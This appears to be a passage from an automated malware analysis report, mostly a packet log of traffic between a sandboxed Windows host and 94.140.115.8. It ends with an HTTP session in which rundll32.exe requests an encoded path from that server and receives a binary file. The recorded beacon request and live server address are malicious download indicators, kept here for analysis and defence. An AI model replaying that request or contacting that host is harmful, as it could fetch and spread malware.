                            Apr 28, 2022 15:47:51.809387922 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809395075 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809423923 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809442997 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809617043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809634924 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809676886 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809689045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.809704065 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809716940 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.809762001 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.866056919 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866080999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866096973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866113901 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866131067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866147041 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866162062 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866179943 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.866199017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866214991 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866234064 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866246939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.866359949 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931590080 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931619883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931638002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931655884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931673050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931680918 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931690931 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931713104 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931727886 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931740999 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931751013 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931768894 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931777000 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931792021 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931830883 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931849003 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931862116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.931893110 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.931915045 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932434082 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932461977 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932478905 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932492018 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:51.932503939 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932519913 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:51.932533026 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010667086 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010694981 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010711908 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010724068 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010757923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010773897 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010795116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010802984 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010873079 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010876894 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010909081 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010927916 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010948896 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010955095 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010967016 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.010982037 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.010988951 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011018991 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011085033 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011101961 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011113882 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.011121988 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011135101 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.011168957 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093393087 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093420029 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093436956 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093453884 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093466043 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093488932 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093494892 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093512058 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093524933 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093542099 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093575954 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093594074 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093611002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093628883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093638897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093657017 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093674898 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093683004 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093699932 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093710899 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093719959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.093744993 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.093777895 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116108894 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116137028 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116154909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116170883 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116188049 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116200924 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116219997 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116228104 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116240025 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.116272926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.116295099 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.117630959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117651939 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117667913 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117679119 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.117718935 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.117760897 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.163832903 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163858891 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163877010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163888931 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.163938046 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.164000034 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165623903 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165654898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165673018 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165690899 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.165698051 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165710926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.165747881 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.179863930 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179893970 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179910898 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179923058 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.179994106 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.180036068 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205565929 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205585957 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205646038 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205657005 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205670118 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.205689907 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.205727100 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.208410978 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208431959 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208477974 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208491087 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.208518982 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.208554029 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.222927094 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222948074 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222965002 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.222979069 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.223001003 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.223041058 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.260257006 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260283947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260302067 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260313988 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.260402918 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.260504961 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.265027046 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265050888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265068054 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265079021 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.265191078 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.265224934 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.280093908 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280116081 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280132055 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280139923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.280240059 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.281203985 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323599100 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323626995 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323645115 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323662043 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323681116 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323692083 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323709011 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323719978 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323734045 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.323751926 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.323772907 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.327682972 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327706099 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327723980 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327734947 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.327764988 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.327784061 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.341161966 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341193914 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341212034 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341224909 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.341249943 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.341285944 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.371115923 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371141911 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371157885 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371170998 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.371213913 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.371228933 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.372364044 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372385979 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372402906 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372437954 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.372452021 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.372486115 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373045921 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373097897 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373112917 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373126030 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373141050 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.373167038 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.373192072 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.413743973 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413769960 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413786888 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413800001 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.413907051 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.414437056 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414457083 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414474010 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414485931 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.414526939 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.414572001 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417244911 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417268991 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417325020 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417385101 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417397976 CEST804975994.140.115.8192.168.2.4
                            Apr 28, 2022 15:47:52.417429924 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.417474985 CEST4975980192.168.2.494.140.115.8
                            Apr 28, 2022 15:47:52.429986954 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.430010080 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.430028915 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.430041075 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.430078030 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.430104971 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.454997063 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.455024004 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.455044031 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.455060005 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.455097914 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.455121040 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.456686020 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.456712008 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.456727982 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.456736088 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.456782103 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.456810951 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.457371950 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.457391977 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.457433939 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.457442045 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.457453966 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.457477093 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.457499027 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.470495939 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.470524073 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.470540047 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.470552921 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.470587969 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.470613003 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.492372036 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.492404938 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.492422104 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.492434025 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.492525101 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.492556095 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.493151903 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.493201017 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.493232965 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.493268967 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.493300915 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.493314981 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.493350983 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.503247023 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.503277063 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.503293037 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.503308058 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.503416061 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.503434896 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.525259018 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525288105 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525306940 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525325060 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525341988 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525365114 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.525382042 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.525393963 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525408030 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.525435925 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.525456905 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.526645899 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.526670933 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.526705980 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.526717901 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.526736021 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.526747942 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.526797056 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.527530909 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.527556896 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.527574062 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.527585983 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.527611971 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.527632952 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.558998108 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559027910 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559046984 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559066057 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559082985 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559098959 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559113026 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559135914 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.559185982 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.559232950 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559247017 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:52.559269905 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.559310913 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.636763096 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:52.710238934 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:53.034704924 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:53.034733057 CEST  80  49759  94.140.115.8  192.168.2.4
                            Apr 28, 2022 15:47:53.034774065 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:47:53.034794092 CEST  49759  80  192.168.2.4  94.140.115.8
                            Apr 28, 2022 15:48:47.712887049 CEST  49759  80  192.168.2.4  94.140.115.8
                            • 94.140.115.8
                            Session ID  Source IP  Source Port  Destination IP  Destination Port  Process
                            0  192.168.2.4  49759  94.140.115.8  80  C:\Windows\SysWOW64\rundll32.exe
                            Timestamp  kBytes transferred  Direction  Data
                            Apr 28, 2022 15:47:50.266267061 CEST  1155  OUT  GET /drew/ik1LQOZMh/mVRbIyzEQTxBwTr6Z5u6/zI22UmjAz8JK2nSoDWz/PBbBE92xQ6eDvkHhGI4LUa/C2IzDYhRuCy1X/B8bDGu4d/NNeE2BpCwJS_2BLL1GATet_/2FJaGdNT8S/qykJG_2BzgaYwDsmt/6L38BacVeBDK/DI5poywJVgk/0BVE0JF2RsEX1d/ehK8HVo5nM5dN_2BvfT0B/d2eei3kq6JFp_2Bo/wjjnHOVxOWAf9Rl/iq5emFWqLQuh9aW2bI/a4pKOz5Hp/Nn13tipc/V.jlk HTTP/1.1
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: 94.140.115.8
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Apr 28, 2022 15:47:50.638051987 CEST  1156  IN  HTTP/1.1 200 OK
                            Server: nginx/1.14.2
                            Date: Thu, 28 Apr 2022 13:47:50 GMT
                            Content-Type: application/octet-stream
                            Content-Length: 186004
                            Connection: keep-alive
                            Pragma: public
                            Accept-Ranges: bytes
                            Expires: 0
                            Cache-Control: must-revalidate, post-check=0, pre-check=0
                            Content-Disposition: inline; filename="626a9b068dec4.bin"
